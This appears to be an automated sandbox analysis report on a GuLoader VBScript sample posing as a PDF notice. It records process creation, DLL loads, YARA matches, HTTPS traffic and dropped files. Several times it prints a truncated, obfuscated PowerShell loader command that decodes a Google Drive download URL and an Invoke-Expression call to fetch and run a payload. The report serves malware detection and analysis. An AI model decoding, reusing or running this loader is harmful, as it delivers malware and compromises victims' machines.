        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.10:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49705 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: amsi64_7432.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejt
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtJump to behavior
        Source: 11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7222
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7222Jump to behavior
        Source: amsi64_7432.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@4/4@2/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Maskes.leaJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv2plouf.aj4.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejt
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .pdbn8 source: powershell.exe, 00000008.00000002.1468594433.000001D3DC68A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: powershell.exe, 00000008.00000002.1469063176.000001D3DC814000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .pdbc source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: scorlib.pdb= source: powershell.exe, 00000008.00000002.1467868806.000001D3DC610000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: U'n.pdb source: powershell.exe, 00000008.00000002.1469726606.000001D3DC872000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#", "0")
        Yara detected GuLoader
